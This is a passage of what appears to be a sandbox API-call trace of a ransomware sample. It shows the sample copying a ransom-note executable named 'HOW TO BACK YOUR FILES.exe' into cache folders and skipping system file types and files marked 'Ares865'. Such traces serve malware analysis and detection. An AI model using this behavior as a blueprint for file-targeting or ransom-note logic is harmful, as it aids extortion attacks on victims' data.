files\\content.ie5\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.332] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.332] GetLastError () returned 0x0 [0042.332] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.332] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.332] CloseHandle (hObject=0x118) returned 1 [0042.332] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.332] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.332] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a4bc500, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a4bc500, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.332] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.332] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.333] lstrcpyW (in: lpString1=0x2e2e916, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0042.333] lstrlenW (lpString="desktop.ini") returned 11 [0042.333] lstrlenW (lpString="Ares865") returned 7 [0042.333] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0042.333] lstrlenW (lpString=".dll") returned 4 [0042.333] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0042.333] lstrlenW (lpString=".lnk") returned 4 [0042.333] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0042.333] lstrlenW (lpString=".ini") returned 4 [0042.333] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0042.333] lstrlenW (lpString=".sys") returned 4 [0042.333] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0042.333] lstrlenW (lpString="desktop.ini") returned 11 [0042.333] lstrcpyW (in: lpString1=0x2e2e916, lpString2="index.dat" | out: lpString1="index.dat") returned="index.dat" [0042.333] lstrlenW (lpString="index.dat") returned 9 [0042.333] lstrlenW (lpString="Ares865") returned 7 [0042.333] lstrcmpiW (lpString1="dex.dat", lpString2="Ares865") returned 1 [0042.333] lstrlenW (lpString=".dll") returned 4 [0042.333] lstrcmpiW (lpString1="index.dat", lpString2=".dll") returned 1 [0042.333] lstrlenW (lpString=".lnk") returned 4 [0042.333] lstrcmpiW (lpString1="index.dat", lpString2=".lnk") returned 1 [0042.333] lstrlenW (lpString=".ini") returned 4 [0042.333] lstrcmpiW (lpString1="index.dat", lpString2=".ini") returned 1 [0042.333] lstrlenW (lpString=".sys") returned 4 [0042.333] lstrcmpiW (lpString1="index.dat", lpString2=".sys") returned 1 [0042.333] lstrlenW (lpString="index.dat") returned 9 [0042.333] lstrcpyW (in: lpString1=0x2e2e916, lpString2="MM5O9XQS" | out: lpString1="MM5O9XQS") returned="MM5O9XQS" [0042.333] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23a0 [0042.333] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xc8) returned 0x2cb310 [0042.333] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d23a8 | out: ListHead=0x2e77d0, ListEntry=0x2d23a8) returned 0x2d2388 [0042.333] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a613160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a613160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PMMR5K9K", cAlternateFileName="")) returned 1 [0042.334] lstrcmpiW (lpString1="PMMR5K9K", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0042.334] lstrcmpiW (lpString1="PMMR5K9K", lpString2="aoldtz.exe") returned 1 [0042.334] lstrcpyW (in: lpString1=0x2e2e916, lpString2="PMMR5K9K" | out: lpString1="PMMR5K9K") returned="PMMR5K9K" [0042.334] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23c0 [0042.334] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xc8) returned 0x2cba28 [0042.334] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d23c8 | out: ListHead=0x2e77d0, ListEntry=0x2d23c8) returned 0x2d23a8 [0042.334] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a613160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a613160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RIJUQL1C", cAlternateFileName="")) returned 1 [0042.334] lstrcmpiW (lpString1="RIJUQL1C", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0042.334] lstrcmpiW (lpString1="RIJUQL1C", lpString2="aoldtz.exe") returned 1 [0042.334] lstrcpyW (in: lpString1=0x2e2e916, lpString2="RIJUQL1C" | out: lpString1="RIJUQL1C") returned="RIJUQL1C" [0042.334] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23e0 [0042.334] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xc8) returned 0x2cbaf8 [0042.334] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d23e8 | out: ListHead=0x2e77d0, ListEntry=0x2d23e8) returned 0x2d23c8 [0042.334] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a4e2660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a4e2660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="X9OHK109", cAlternateFileName="")) returned 1 [0042.334] lstrcmpiW (lpString1="X9OHK109", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0042.334] lstrcmpiW (lpString1="X9OHK109", lpString2="aoldtz.exe") returned 1 [0042.334] lstrcpyW (in: lpString1=0x2e2e916, lpString2="X9OHK109" | out: lpString1="X9OHK109") returned="X9OHK109" [0042.334] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2400 [0042.334] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xc8) returned 0x2cbdb0 [0042.334] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2408 | out: ListHead=0x2e77d0, ListEntry=0x2d2408) returned 0x2d23e8 [0042.334] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a4e2660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a4e2660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="X9OHK109", cAlternateFileName="")) returned 0 [0042.334] FindClose (in: hFindFile=0x2ccea8 | out: hFindFile=0x2ccea8) returned 1 [0042.334] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2408 [0042.334] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" [0042.334] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cbdb0 | out: hHeap=0x2b0000) returned 1 [0042.334] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2400 | out: hHeap=0x2b0000) returned 1 [0042.334] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109") returned 99 [0042.334] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" [0042.335] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.335] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\temporary internet files\\content.ie5\\x9ohk109\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.335] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.335] GetLastError () returned 0x0 [0042.335] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.335] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.335] CloseHandle (hObject=0x118) returned 1 [0042.335] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.335] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.335] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a4e2660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a4e2660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.336] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.336] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.336] lstrcpyW (in: lpString1=0x2e2e928, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0042.336] lstrlenW (lpString="desktop.ini") returned 11 [0042.336] lstrlenW (lpString="Ares865") returned 7 [0042.336] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0042.336] lstrlenW (lpString=".dll") returned 4 [0042.336] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0042.336] lstrlenW (lpString=".lnk") returned 4 [0042.336] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0042.336] lstrlenW (lpString=".ini") returned 4 [0042.336] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0042.336] lstrlenW (lpString=".sys") returned 4 [0042.336] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0042.336] lstrlenW (lpString="desktop.ini") returned 11 [0042.336] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" [0042.336] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cbaf8 | out: hHeap=0x2b0000) returned 1 [0042.336] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23e0 | out: hHeap=0x2b0000) returned 1 [0042.336] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C") returned 99 [0042.336] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" [0042.336] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.336] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\temporary internet files\\content.ie5\\rijuql1c\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.337] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.337] GetLastError () returned 0x0 [0042.337] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.337] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.337] CloseHandle (hObject=0x118) returned 1 [0042.337] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.337] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.337] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a613160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a613160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.337] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.337] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.337] lstrcpyW (in: lpString1=0x2e2e928, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0042.337] lstrlenW (lpString="desktop.ini") returned 11 [0042.337] lstrlenW (lpString="Ares865") returned 7 [0042.338] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0042.338] lstrlenW (lpString=".dll") returned 4 [0042.338] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0042.338] lstrlenW (lpString=".lnk") returned 4 [0042.338] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0042.338] lstrlenW (lpString=".ini") returned 4 [0042.338] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0042.338] lstrlenW (lpString=".sys") returned 4 [0042.338] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0042.338] lstrlenW (lpString="desktop.ini") returned 11 [0042.338] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" [0042.338] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cba28 | out: hHeap=0x2b0000) returned 1 [0042.338] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23c0 | out: hHeap=0x2b0000) returned 1 [0042.338] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K") returned 99 [0042.338] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" [0042.338] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.338] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\temporary internet files\\content.ie5\\pmmr5k9k\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.339] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.339] GetLastError () returned 0x0 [0042.339] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.339] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.339] CloseHandle (hObject=0x118) returned 1 [0042.339] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.339] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.339] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a613160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a613160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.339] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.339] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.339] lstrcpyW (in: lpString1=0x2e2e928, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0042.339] lstrlenW (lpString="desktop.ini") returned 11 [0042.339] lstrlenW (lpString="Ares865") returned 7 [0042.339] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0042.339] lstrlenW (lpString=".dll") returned 4 [0042.339] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0042.339] lstrlenW (lpString=".lnk") returned 4 [0042.339] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0042.339] lstrlenW (lpString=".ini") returned 4 [0042.340] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0042.340] lstrlenW (lpString=".sys") returned 4 [0042.340] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0042.340] lstrlenW (lpString="desktop.ini") returned 11 [0042.340] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" [0042.340] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb310 | out: hHeap=0x2b0000) returned 1 [0042.340] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23a0 | out: hHeap=0x2b0000) returned 1 [0042.340] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS") returned 99 [0042.340] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" [0042.340] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.340] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\temporary internet files\\content.ie5\\mm5o9xqs\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.340] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.340] GetLastError () returned 0x0 [0042.340] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.340] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.341] CloseHandle (hObject=0x118) returned 1 [0042.341] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.341] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.341] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a613160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a613160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.341] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.341] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.341] lstrcpyW (in: lpString1=0x2e2e928, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0042.341] lstrlenW (lpString="desktop.ini") returned 11 [0042.341] lstrlenW (lpString="Ares865") returned 7 [0042.341] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0042.341] lstrlenW (lpString=".dll") returned 4 [0042.341] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0042.341] lstrlenW (lpString=".lnk") returned 4 [0042.341] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0042.341] lstrlenW (lpString=".ini") returned 4 [0042.341] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0042.341] lstrlenW (lpString=".sys") returned 4 [0042.341] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0042.341] lstrlenW (lpString="desktop.ini") returned 11 [0042.341] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft" [0042.341] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0042.341] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2380 | out: hHeap=0x2b0000) returned 1 [0042.341] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft") returned 63 [0042.341] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft" [0042.342] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO 